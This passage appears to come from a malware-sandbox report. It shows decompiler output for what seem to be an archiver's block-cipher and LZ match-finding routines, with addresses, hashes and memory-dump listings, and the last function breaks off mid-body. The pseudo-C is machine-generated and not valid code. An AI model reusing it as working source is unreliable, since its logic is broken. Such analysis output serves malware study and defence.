                                                                                                            • Opcode Fuzzy Hash: e7ef8efe9f62bb1c03405a6720a2ebfc8e36302898aaddfe372e3d5dd2e85563
                                                                                                            • Instruction Fuzzy Hash: DC8129327281926AD720CF29A48067E7BA2F789344F595235EB9ED3B84DE3DD601CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B54A2C Relevance: .2, Instructions: 230COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00007FF67FF650B54A2C(long long __rbx, char* __rcx, void* __rdx, long long __rdi, long long __rsi, unsigned int __r8, void* __r9, long long __r12) {
				void* _v24;
				char _v41;
				char _v42;
				char _v43;
				signed int _v44;
				char _v45;
				char _v46;
				char _v47;
				signed int _v48;
				char _v49;
				char _v50;
				char _v51;
				signed int _v52;
				char _v53;
				char _v54;
				char _v55;
				signed int _v56;
				void* _v57;
				void* _v58;
				void* _v59;
				void* _v60;
				void* _v61;
				void* _v62;
				void* _v63;
				void* _v64;
				void* _v65;
				void* _v66;
				void* _v67;
				void* _v68;
				void* _v69;
				void* _v70;
				void* _v71;
				char _v72;
				signed int _t308;
				unsigned long long _t356;
				void* _t358;
				void* _t363;
				signed long long _t365;
				signed long long _t370;
				signed int* _t382;
				signed long long _t383;
				signed long long _t384;
				signed int* _t385;
				signed long long _t386;
				void* _t387;
				signed int* _t392;
				signed int* _t405;
				void* _t408;
				void* _t410;
				unsigned long long _t414;
				signed long long _t426;
				void* _t428;

				if (__r8 == 0) goto 0x50b54e34;
				_t363 = _t410;
				 *((long long*)(_t363 + 8)) = __rbx;
				 *((long long*)(_t363 + 0x10)) = __rsi;
				 *((long long*)(_t363 + 0x18)) = __rdi;
				 *((long long*)(_t363 + 0x20)) = __r12;
				_push(_t428);
				_t408 = _t410;
				_t414 = __r8 >> 4;
				if ( *__rcx == 0) goto 0x50b54a6d;
				E00007FF67FF650B54E38(__rcx, __rdx, _t414, __r9);
				goto 0x50b54e17;
				asm("movups xmm1, [ecx+0x8]");
				asm("movups [ebp-0x10], xmm1");
				_t356 = _t414;
				if (_t356 == 0) goto 0x50b54e11;
				_t405 = __rcx + 0x28;
				r15d = 4;
				_t426 =  *((intOrPtr*)(__rcx + 4));
				_t365 = _t426 << 4;
				_t382 = __rcx + 0x18 + _t365;
				 *(_t382 +  &_v72 - _t382) =  *(__rdx - _t382 + _t382) ^  *_t382;
				_t383 = _t382 + _t428;
				if (_t356 != 0) goto 0x50b54ab4;
				_v56 =  *(0x7ff650b10000 + 0x9cff0 + _t383 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t365 * 4);
				_v52 =  *(0x7ff650b10000 + 0x9d3f0 + _t383 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t365 * 4);
				_v48 =  *(0x7ff650b10000 + 0x9d7f0 + _t383 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t365 * 4);
				_t384 = _t426 - 1;
				_v44 =  *(0x7ff650b10000 + 0x9dbf0 + _t383 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t365 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t365 * 4);
				if (_t384 - 1 <= 0) goto 0x50b54cb0;
				_t392 =  &_v56;
				_t370 =  &_v56 + _t392;
				 *(_t408 + _t392 - 0x30) =  *(__rcx + 0x18 + (_t384 << 4) - _t392 + _t370) ^  *_t370;
				_t358 = _t392 + _t428 - 0x10;
				if (_t358 < 0) goto 0x50b54bbd;
				_v56 =  *(0x7ff650b10000 + 0x9cff0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t370 * 4);
				_v52 =  *(0x7ff650b10000 + 0x9d3f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t370 * 4);
				_v48 =  *(0x7ff650b10000 + 0x9d7f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9dbf0 + _t370 * 4);
				_v44 =  *(0x7ff650b10000 + 0x9dbf0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9d7f0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9d3f0 + _t370 * 4) ^  *(0x7ff650b10000 + 0x9cff0 + _t370 * 4);
				if (_t358 != 0) goto 0x50b54bbb;
				_t385 = _t405;
				 *(_t385 +  &_v72 - _t405) =  *(_t385 +  &_v56 - _t405) ^  *_t385;
				_t386 = _t385 + _t428;
				if (_t358 != 0) goto 0x50b54cc4;
				_v56 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v55 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v54 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v53 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v52 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v51 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v50 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v49 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v48 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v47 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v46 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v45 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v44 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v43 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v42 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				_v41 =  *((intOrPtr*)(_t370 + 0x7ff650babef0));
				 *(_t408 + _t386 * 4 - 0x20) =  *(_t408 + _t386 * 4 - 0x20) ^  *(__rcx + 0x18 + _t386 * 4);
				_t387 = _t386 + 1;
				if (_t387 - _t428 < 0) goto 0x50b54dc7;
				if ( *((char*)(__rcx + 1)) == 0) goto 0x50b54df2;
				_t308 =  *(_t408 + _t387 - 0x10);
				 *(_t408 + _t387 - 0x20) =  *(_t408 + _t387 - 0x20) ^ _t308;
				if (_t387 + _t428 - 0x10 < 0) goto 0x50b54de1;
				asm("inc ecx");
				asm("movups xmm0, [ebp-0x20]");
				asm("movups [ebp-0x10], xmm1");
				asm("inc ebx");
				if (_t414 - 1 != 0) goto 0x50b54a92;
				asm("repe inc ecx");
				return _t308;
			}























































                                                                                                            0x7ff650b54a2f
                                                                                                            0x7ff650b54a35
                                                                                                            0x7ff650b54a38
                                                                                                            0x7ff650b54a3c
                                                                                                            0x7ff650b54a40
                                                                                                            0x7ff650b54a44
                                                                                                            0x7ff650b54a4b
                                                                                                            0x7ff650b54a4d
                                                                                                            0x7ff650b54a54
                                                                                                            0x7ff650b54a61
                                                                                                            0x7ff650b54a63
                                                                                                            0x7ff650b54a68
                                                                                                            0x7ff650b54a6d
                                                                                                            0x7ff650b54a71
                                                                                                            0x7ff650b54a75
                                                                                                            0x7ff650b54a78
                                                                                                            0x7ff650b54a7e
                                                                                                            0x7ff650b54a85
                                                                                                            0x7ff650b54a92
                                                                                                            0x7ff650b54aa1
                                                                                                            0x7ff650b54aa8
                                                                                                            0x7ff650b54ab9
                                                                                                            0x7ff650b54abc
                                                                                                            0x7ff650b54ac3
                                                                                                            0x7ff650b54afd
                                                                                                            0x7ff650b54b30
                                                                                                            0x7ff650b54b63
                                                                                                            0x7ff650b54b92
                                                                                                            0x7ff650b54b95
                                                                                                            0x7ff650b54b9c
                                                                                                            0x7ff650b54ba5
                                                                                                            0x7ff650b54bc1
                                                                                                            0x7ff650b54bc9
                                                                                                            0x7ff650b54bd0
                                                                                                            0x7ff650b54bd4
                                                                                                            0x7ff650b54c12
                                                                                                            0x7ff650b54c45
                                                                                                            0x7ff650b54c78
                                                                                                            0x7ff650b54ca3
                                                                                                            0x7ff650b54caa
                                                                                                            0x7ff650b54cb4
                                                                                                            0x7ff650b54cc9
                                                                                                            0x7ff650b54ccc
                                                                                                            0x7ff650b54cd3
                                                                                                            0x7ff650b54ce3
                                                                                                            0x7ff650b54cf2
                                                                                                            0x7ff650b54d01
                                                                                                            0x7ff650b54d10
                                                                                                            0x7ff650b54d1f
                                                                                                            0x7ff650b54d2e
                                                                                                            0x7ff650b54d3d
                                                                                                            0x7ff650b54d4c
                                                                                                            0x7ff650b54d5b
                                                                                                            0x7ff650b54d6a
                                                                                                            0x7ff650b54d79
                                                                                                            0x7ff650b54d88
                                                                                                            0x7ff650b54d97
                                                                                                            0x7ff650b54da6
                                                                                                            0x7ff650b54db5
                                                                                                            0x7ff650b54dc4
                                                                                                            0x7ff650b54dcc
                                                                                                            0x7ff650b54dd0
                                                                                                            0x7ff650b54dd6
                                                                                                            0x7ff650b54ddd
                                                                                                            0x7ff650b54de1
                                                                                                            0x7ff650b54de5
                                                                                                            0x7ff650b54df0
                                                                                                            0x7ff650b54df2
                                                                                                            0x7ff650b54df6
                                                                                                            0x7ff650b54dfa
                                                                                                            0x7ff650b54dfe
                                                                                                            0x7ff650b54e0b
                                                                                                            0x7ff650b54e11
                                                                                                            0x7ff650b54e34

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7f5ed9adff1d97353a9f2b07a787312b3d7ea1528f7a93f3e35e0e5b5c8076a3
                                                                                                            • Instruction ID: 56c2b79368e5eb9e1085702e963703ca2ac4fec5d28d6b841df8c32c690761d6
                                                                                                            • Opcode Fuzzy Hash: 7f5ed9adff1d97353a9f2b07a787312b3d7ea1528f7a93f3e35e0e5b5c8076a3
                                                                                                            • Instruction Fuzzy Hash: 2AC1B337A182D14DE302CBB985988FD3FF5F35E74C7094292EFD462B4AD6299605CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3C668 Relevance: .2, Instructions: 218COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E00007FF67FF650B3C668(signed int __rcx, void* __rdx, void* __r8, signed int __r9, signed int __r11) {
				signed int _t115;
				intOrPtr _t138;
				intOrPtr _t143;
				signed int _t179;
				signed int _t183;
				intOrPtr _t187;
				void* _t211;
				signed long long _t213;
				intOrPtr _t218;
				signed long long _t223;
				signed long long _t225;
				signed int _t229;
				intOrPtr _t231;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t237;
				signed long long _t241;
				intOrPtr _t245;
				signed long long _t247;
				void* _t249;
				signed long long _t251;

				 *((long long*)(_t236 + 8)) = __rcx;
				_push(_t225);
				_push(_t247);
				_push(_t249);
				_push(_t251);
				_t237 = _t236 - 0x18;
				_t218 =  *((intOrPtr*)(__rcx + 0xe0));
				r11d =  *(__rdx + 0x8048);
				_t213 =  *((intOrPtr*)(__rcx + 0x108));
				r14d = 0;
				r15d = 0;
				_t183 =  *(_t218 + __r11) & 0x000000ff;
				r8d =  *(_t213 + __r11 * 4);
				r12d =  *((intOrPtr*)(__rdx + 0x8050));
				 *(_t237 + 0x78) = _t183;
				_t143 =  *((intOrPtr*)(__rcx + 0x134));
				 *_t237 = _t143;
				_t179 = ((((_t183 * 0x00002773 ^  *(_t218 + __r11 + 1) & 0x000000ff) * 0x00002773 ^  *(_t218 + __r11 + 2) & 0x000000ff) * 0x00002773 ^  *(_t218 + __r11 + 3) & 0x000000ff) * 0x00002773 ^  *(_t218 + __r11 + 4) & 0x000000ff) &  *(__rcx + 0x114);
				r13b =  *((intOrPtr*)(_t213 + _t218));
				 *((intOrPtr*)(_t237 + 0x68)) = r13b;
				 *(_t237 + 0x70) = _t179;
				if (_t143 == 0) goto 0x50b3c9ad;
				_t115 = r11d - r8d &  *(__rcx + 0x120);
				if (_t115 -  *((intOrPtr*)(__rcx + 0x124)) > 0) goto 0x50b3c9ad;
				if (_t115 - r15d <= 0) goto 0x50b3c9ad;
				r9d = r8d;
				r15d = _t115;
				 *(_t237 + 4) = _t115;
				if ( *(__r9 + _t218) == bpl) goto 0x50b3c78e;
				if (((((( *(__r9 + _t218 + 1) & 0x000000ff ^ ( *(__r9 + _t218) & 0x000000ff) * 0x00002773) * 0x00002773 ^  *(__r9 + _t218 + 2) & 0x000000ff) * 0x00002773 ^  *(__r9 + _t218 + 3) & 0x000000ff) * 0x00002773 ^  *(__r9 + _t218 + 4) & 0x000000ff) &  *(__rcx + 0x114)) != _t179) goto 0x50b3c9ad;
				if ( *((intOrPtr*)(_t213 + _t218)) != r13b) goto 0x50b3c995;
				r8d = r8d - r14d;
				r8d = r8d &  *(__rcx + 0x120);
				 *(_t237 + 8) =  *(_t237 + 8) & _t225;
				r15d = r8d;
				if ( *((intOrPtr*)(__rcx + _t218)) !=  *((intOrPtr*)(__r8 + _t218))) goto 0x50b3c7f5;
				_t234 =  *((intOrPtr*)(__rdx + 0x8054));
				r9d = r11d;
				_t229 =  *(_t237 + 8);
				r9d = r9d - r15d;
				r8d = r15d;
				if (_t229 - _t234 >= 0) goto 0x50b3c7eb;
				r8d = r8d + 1;
				if ( *((intOrPtr*)(_t213 + _t218)) ==  *((intOrPtr*)(__r8 + _t218))) goto 0x50b3c7d1;
				 *(_t237 + 8) = _t229 + 1;
				_t231 =  *((intOrPtr*)(_t237 + 0x60));
				if (1 -  *((intOrPtr*)(__rdx + 0x8050)) <= 0) goto 0x50b3c96f;
				_t245 =  *((intOrPtr*)(_t231 + 0x108));
				_t54 = _t225 - 4; // -4
				r13d = _t54;
				r14d = 0;
				_t57 = _t249 + 1; // 0x1
				r9d = _t57;
				if (r13d - r9d <= 0) goto 0x50b3c86b;
				r8d =  *(_t245 + (__rcx & _t213) * 4);
				_t127 =  <=  ? r14d : r9d;
				r9d = r9d + 1;
				r14d =  <=  ? r14d : r9d;
				r8d =  <=  ?  *((intOrPtr*)(_t245 + _t251 * 4)) : r8d;
				if (r9d - r13d < 0) goto 0x50b3c821;
				_t187 =  *((intOrPtr*)(__rdx + 0x8050));
				r13d =  *(_t231 + 0x120);
				r9d = __r11 + _t249;
				_t241 = __r9 & _t247;
				r11d = r11d - r15d;
				r12d = _t187;
				r11d = r11d & r13d;
				r12d = r12d - r14d;
				r8d =  *(_t218 + _t241) & 0x000000ff;
				 *(_t237 + 0x78) = r8b;
				 *(_t237 + 0x70) = ((((r8d * 0x00002773 ^  *(_t218 + _t241 + 1) & 0x000000ff) * 0x00002773 ^  *(_t218 + _t241 + 2) & 0x000000ff) * 0x00002773 ^  *(_t218 + _t241 + 3) & 0x000000ff) * 0x00002773 ^  *(_t218 + _t241 + 4) & 0x000000ff) &  *(_t231 + 0x114);
				if (r11d -  *((intOrPtr*)(_t231 + 0x124)) > 0) goto 0x50b3c9ad;
				if (r11d == 0) goto 0x50b3c9ad;
				if (_t187 - 2 <= 0) goto 0x50b3c907;
				if (r11d -  *(__rdx + 0x804c) << 0xe <= 0) goto 0x50b3c907;
				if (1 - _t234 + 5 < 0) goto 0x50b3c9ad;
				if (1 - 4 <= 0) goto 0x50b3c96a;
				if (1 - _t234 + 1 > 0) goto 0x50b3c922;
				if (r11d >> 5 -  *(__rdx + 0x804c) > 0) goto 0x50b3c96a;
				_t223 =  *(_t237 + 8);
				 *( *((intOrPtr*)(__rdx + 0x8030)) + _t223 * 4) = r11d;
				 *(__rdx + 0x804c) = r11d;
				 *((intOrPtr*)(__rdx + 0x8050)) = 1;
				_t211 = 1 -  *((intOrPtr*)(__rdx + 0x8054));
				if (_t211 >= 0) goto 0x50b3c9ad;
				r12d = 1;
				r12d = r12d - r14d;
				r13b =  *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t231 + 0xe0))));
				 *((intOrPtr*)(_t237 + 0x68)) = r13b;
				goto 0x50b3c96f;
				r13b =  *((intOrPtr*)(_t237 + 0x68));
				r11d =  *(__rdx + 0x8048);
				r8d = _t249 + _t251;
				r8d = r8d &  *(_t231 + 0x120);
				r15d =  *(_t237 + 4);
				 *_t237 =  *_t237 + 0xffffffff;
				r8d =  *( *((intOrPtr*)(_t231 + 0x108)) + _t223 * 4);
				if (_t211 != 0) goto 0x50b3c712;
				_t138 =  *((intOrPtr*)(__rdx + 0x8050));
				if (_t138 -  *((intOrPtr*)(__rdx + 0x8040)) <= 0) goto 0x50b3c9c4;
				 *((intOrPtr*)(__rdx + 0x8040)) = _t138;
				return _t138;
			}
























                                                                                                            0x7ff650b3c668
                                                                                                            0x7ff650b3c670
                                                                                                            0x7ff650b3c673
                                                                                                            0x7ff650b3c675
                                                                                                            0x7ff650b3c677
                                                                                                            0x7ff650b3c679
                                                                                                            0x7ff650b3c67d
                                                                                                            0x7ff650b3c687
                                                                                                            0x7ff650b3c691
                                                                                                            0x7ff650b3c698
                                                                                                            0x7ff650b3c69b
                                                                                                            0x7ff650b3c69e
                                                                                                            0x7ff650b3c6a3
                                                                                                            0x7ff650b3c6ad
                                                                                                            0x7ff650b3c6ba
                                                                                                            0x7ff650b3c6e8
                                                                                                            0x7ff650b3c6ee
                                                                                                            0x7ff650b3c6f7
                                                                                                            0x7ff650b3c6fd
                                                                                                            0x7ff650b3c701
                                                                                                            0x7ff650b3c706
                                                                                                            0x7ff650b3c70c
                                                                                                            0x7ff650b3c718
                                                                                                            0x7ff650b3c724
                                                                                                            0x7ff650b3c72d
                                                                                                            0x7ff650b3c733
                                                                                                            0x7ff650b3c736
                                                                                                            0x7ff650b3c739
                                                                                                            0x7ff650b3c741
                                                                                                            0x7ff650b3c788
                                                                                                            0x7ff650b3c796
                                                                                                            0x7ff650b3c79c
                                                                                                            0x7ff650b3c7a2
                                                                                                            0x7ff650b3c7ab
                                                                                                            0x7ff650b3c7b0
                                                                                                            0x7ff650b3c7ba
                                                                                                            0x7ff650b3c7bc
                                                                                                            0x7ff650b3c7c3
                                                                                                            0x7ff650b3c7c6
                                                                                                            0x7ff650b3c7cb
                                                                                                            0x7ff650b3c7ce
                                                                                                            0x7ff650b3c7d4
                                                                                                            0x7ff650b3c7d6
                                                                                                            0x7ff650b3c7e9
                                                                                                            0x7ff650b3c7eb
                                                                                                            0x7ff650b3c7f0
                                                                                                            0x7ff650b3c7fe
                                                                                                            0x7ff650b3c804
                                                                                                            0x7ff650b3c80b
                                                                                                            0x7ff650b3c80b
                                                                                                            0x7ff650b3c80f
                                                                                                            0x7ff650b3c816
                                                                                                            0x7ff650b3c816
                                                                                                            0x7ff650b3c81d
                                                                                                            0x7ff650b3c837
                                                                                                            0x7ff650b3c84c
                                                                                                            0x7ff650b3c850
                                                                                                            0x7ff650b3c855
                                                                                                            0x7ff650b3c858
                                                                                                            0x7ff650b3c862
                                                                                                            0x7ff650b3c864
                                                                                                            0x7ff650b3c86b
                                                                                                            0x7ff650b3c872
                                                                                                            0x7ff650b3c876
                                                                                                            0x7ff650b3c879
                                                                                                            0x7ff650b3c87c
                                                                                                            0x7ff650b3c87f
                                                                                                            0x7ff650b3c882
                                                                                                            0x7ff650b3c885
                                                                                                            0x7ff650b3c897
                                                                                                            0x7ff650b3c8ce
                                                                                                            0x7ff650b3c8d9
                                                                                                            0x7ff650b3c8e2
                                                                                                            0x7ff650b3c8eb
                                                                                                            0x7ff650b3c8fa
                                                                                                            0x7ff650b3c901
                                                                                                            0x7ff650b3c90a
                                                                                                            0x7ff650b3c911
                                                                                                            0x7ff650b3c920
                                                                                                            0x7ff650b3c929
                                                                                                            0x7ff650b3c92e
                                                                                                            0x7ff650b3c932
                                                                                                            0x7ff650b3c939
                                                                                                            0x7ff650b3c940
                                                                                                            0x7ff650b3c947
                                                                                                            0x7ff650b3c950
                                                                                                            0x7ff650b3c95c
                                                                                                            0x7ff650b3c95f
                                                                                                            0x7ff650b3c963
                                                                                                            0x7ff650b3c968
                                                                                                            0x7ff650b3c96a
                                                                                                            0x7ff650b3c96f
                                                                                                            0x7ff650b3c976
                                                                                                            0x7ff650b3c97a
                                                                                                            0x7ff650b3c990
                                                                                                            0x7ff650b3c995
                                                                                                            0x7ff650b3c9a3
                                                                                                            0x7ff650b3c9a7
                                                                                                            0x7ff650b3c9ad
                                                                                                            0x7ff650b3c9bb
                                                                                                            0x7ff650b3c9bd
                                                                                                            0x7ff650b3c9d4

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cefe2a847d7e052956a862b79a411a1b015bfb6dee07656209b6df6740de7cb
                                                                                                            • Instruction ID: 126ffa414686ec95661671baf3d3534c5c0817cb28acb686b59d3c5bd59e41cd
                                                                                                            • Opcode Fuzzy Hash: 9cefe2a847d7e052956a862b79a411a1b015bfb6dee07656209b6df6740de7cb
                                                                                                            • Instruction Fuzzy Hash: B69120336185D28BD35A8F35D194BAE7BA1F349780F2A8125EB8797794DE3DE800CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3C30C Relevance: .2, Instructions: 214COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E00007FF67FF650B3C30C(signed int __ebp, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, void* __r9, void* __r11, long long _a8, char _a16, intOrPtr _a24, signed int _a32) {
				void* _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				intOrPtr _t139;
				signed int _t157;
				signed int _t175;
				signed int _t176;
				void* _t179;
				void* _t210;
				long long _t212;
				signed long long _t213;
				signed long long _t218;
				void* _t221;
				signed long long _t224;
				signed long long _t229;
				void* _t230;
				intOrPtr _t231;
				void* _t232;
				signed long long _t233;
				signed long long _t234;
				void* _t235;

				_t232 = __r11;
				_t230 = __r9;
				_a8 = __rbx;
				_t175 =  *(__rdx + 0x804c);
				if ( *((intOrPtr*)(__rdx + 0x8074)) == _t175) goto 0x50b3c647;
				if ( *((intOrPtr*)(__rdx + 0x8078)) == _t175) goto 0x50b3c647;
				if ( *((intOrPtr*)(__rdx + 0x807c)) == _t175) goto 0x50b3c647;
				if ( *((intOrPtr*)(__rdx + 0x8080)) == _t175) goto 0x50b3c647;
				if (_t175 ==  *((intOrPtr*)(__rdx + 0x8068))) goto 0x50b3c647;
				if (E00007FF67FF650B3B634(__rdx, __rcx, __rdx, _t221, __rcx, _t224, __r8, __r11) != 0) goto 0x50b3c661;
				r13d =  *(__rdx + 0x8048);
				r11d = 0;
				_t231 =  *((intOrPtr*)(__rcx + 0xe0));
				r13d = r13d + 1;
				_t212 =  *((intOrPtr*)(__rcx + 0x108));
				r15d =  *(__rcx + 0x114);
				r12d =  *(__rcx + 0x120);
				r8d =  *(__rcx + 0x138);
				r13d = r13d & r12d;
				_a32 = _a32 & r11d;
				_v64 = _t212;
				_v88 = r15d;
				r9d =  *(_t212 + _t234 * 4);
				_t102 =  *(_t231 + _t234) & 0x000000ff;
				bpl = _t102;
				_v72 = _t102;
				_v84 = __ebp;
				_v80 = r8d;
				r14d = (((_t102 * 0x00002773 ^  *(_t231 + _t234 + 1) & 0x000000ff) * 0x00002773 ^  *(_t231 + _t234 + 2) & 0x000000ff) * 0x00002773 ^  *(_t231 + _t234 + 3) & 0x000000ff) * 0x2773;
				r14d = r14d ^  *(_t231 + _t234 + 4) & 0x000000ff;
				r14d = r14d & r15d;
				r15d =  *(__rdx + 0x8050);
				_t107 = _t235 - 1;
				_v68 = _t107;
				_a24 = _t107;
				_a16 =  *((intOrPtr*)(_t212 + _t231));
				if (r8d == 0) goto 0x50b3c647;
				_t139 =  *((intOrPtr*)(__rcx + 0x124));
				_v76 = _t139;
				_t112 = r13d - r9d & r12d;
				if (_t112 - _t139 > 0) goto 0x50b3c647;
				if (_t112 - _a32 <= 0) goto 0x50b3c647;
				r8d = r9d;
				_a32 = _t112;
				if ( *(__r8 + _t231) == bpl) goto 0x50b3c4c8;
				if (((((( *(__r8 + _t231 + 1) & 0x000000ff ^ ( *(__r8 + _t231) & 0x000000ff) * 0x00002773) * 0x00002773 ^  *(__r8 + _t231 + 2) & 0x000000ff) * 0x00002773 ^  *(__r8 + _t231 + 3) & 0x000000ff) * 0x00002773 ^  *(__r8 + _t231 + 4) & 0x000000ff) & _v88) != r14d) goto 0x50b3c647;
				if ( *((intOrPtr*)(__rcx + _t231)) != _a16) goto 0x50b3c62c;
				r9d = r9d - r11d;
				r9d = r9d & r12d;
				r9d = 0;
				if (_v72 !=  *((intOrPtr*)(_t231 + _t224))) goto 0x50b3c51f;
				r8d = r13d;
				if (r9d -  *((intOrPtr*)(__rdx + 0x8054)) >= 0) goto 0x50b3c518;
				r8d = r8d + 1;
				r9d = r9d + 1;
				if ( *(__r8 + _t231) ==  *((intOrPtr*)(_t212 + _t231))) goto 0x50b3c4fb;
				if (r9d - r15d < 0) goto 0x50b3c621;
				_t213 = _v64;
				_t65 = _t230 - 4; // -4
				r14d = _t65;
				r11d = 0;
				r15d =  *(_t213 + _t224 * 4);
				_t68 = _t232 + 1; // 0x1
				_t179 = _t68;
				if (r14d - _t179 <= 0) goto 0x50b3c585;
				_t218 = __rcx & _t233;
				r8d =  *(_t213 + _t218 * 4);
				_t123 =  <=  ? r11d : _t179;
				r11d =  <=  ? r11d : _t179;
				r8d =  <=  ? r15d : r8d;
				r15d = r8d;
				if (_t179 + 1 - r14d < 0) goto 0x50b3c544;
				_t176 =  *(__rdx + 0x804c);
				r8d = __r11 + _t234;
				_t229 = __r8 & _t233;
				_t124 =  *(_t231 + _t229) & 0x000000ff;
				_v84 = _t124;
				_a24 = _v68 - r11d;
				r14d = (((_t124 * 0x00002773 ^  *(_t231 + _t229 + 1) & 0x000000ff) * 0x00002773 ^  *(_t231 + _t229 + 2) & 0x000000ff) * 0x00002773 ^  *(_t231 + _t229 + 3) & 0x000000ff) * 0x2773;
				_t157 = r13d - r9d & r12d;
